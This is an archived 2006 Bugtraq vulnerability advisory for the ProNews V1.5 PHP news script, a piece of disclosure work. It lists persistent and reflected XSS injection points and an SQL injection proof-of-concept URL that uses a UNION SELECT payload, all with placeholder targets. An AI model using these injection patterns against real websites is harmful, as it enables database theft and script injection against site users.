lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061209084640.26752.qmail@securityfocus.com>
Date: 9 Dec 2006 08:46:40 -0000
From: mr_kaliman@....com
To: bugtraq@...urityfocus.com
Subject: ProNews V1.5   XSS & SQL Injection

ProNews V1.5
--------------------
Vendor site: http://www.scripthp.com/
Product: ProNews V1.5
Vulnerability: XSS & SQL Injection Vulnerability
Credits: Mr_KaLiMaN
Reported to Vendor: 01.12.06
Public disclosure: 09.12.06
 
Description:
------------
XSS permanent:
http://[victim]/[script_news_path]/admin/change.php?pseudo=[XSS]&email=">[XSS]&date=[XSS]&sujet=[XSS]&message=[XSS]&site=">[XSS]<foo &lien=[XSS]&aa=[existing_news_id]


XSS non permanent:
http://[victim]/[script_news_path]/lire-avis.php?aa=[XSS]


SQL Injection Vulnerability:
http://[victim]/[script_news_path]/lire-avis.php?aa=[SQL INJECTION]
POC: http://[victim]/[script_news_path]/lire-avis.php?aa=1 UNION SELECT null,null,null,null,null FROM [existing_table]--

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ